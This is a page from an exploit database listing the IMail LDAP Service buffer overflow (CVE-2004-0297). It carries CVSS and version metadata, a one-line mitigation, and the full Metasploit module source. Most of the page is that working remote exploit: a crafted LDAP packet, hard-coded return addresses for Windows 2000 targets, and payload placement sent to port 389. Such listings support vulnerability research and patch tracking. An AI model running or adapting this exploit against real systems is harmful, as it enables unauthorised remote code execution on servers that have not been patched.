Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
IMail LDAP Service Buffer Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
IMail
by:
hdm
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: IMail
Affected Version From: 7.1
Affected Version To: 8.5
Patch Exists: YES
Related CWE: CVE-2004-0297
CPE: a:imail:imail
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

IMail LDAP Service Buffer Overflow

This exploits a buffer overflow in the LDAP service that is part of the IMail product. The module was tested against version 7.10 and 8.5, both running on Windows 2000.

Mitigation:

Apply the vendor patch
Source

Exploit-DB raw data:

##
# $Id: imail_thc.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IMail LDAP Service Buffer Overflow',
			'Description'    => %q{
					This exploits a buffer overflow in the LDAP service that is
				part of the IMail product. This module was tested against
				version 7.10 and 8.5, both running on Windows 2000.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2004-0297'],
					[ 'OSVDB', '3984'],
					[ 'BID', '9682'],
					[ 'URL', 'http://secunia.com/advisories/10880/'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					["Windows 2000 English",   { 'Ret' => 0x75023386 }],
					["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }],
				],
			'DisclosureDate' => 'Feb 17 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(389)
			], self.class)
	end

	def exploit
		connect

		buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20"
		buf << "\xcc" * 5000

		# Universal exploit, targets 6.x, 7.x, and 8.x at once ;)
		# Thanks for johnny cyberpunk for 6/7 vs 8 diffs

		buf[77, 4] = "\xeb\x06"
		buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x
		buf[85, 4] = "\xeb\x06"
		buf[89, 4] = [target.ret].pack('V') # 8.x
		buf[93, payload.encoded.length] = payload.encoded

		sock.put(buf)

		handler
		disconnect
	end

end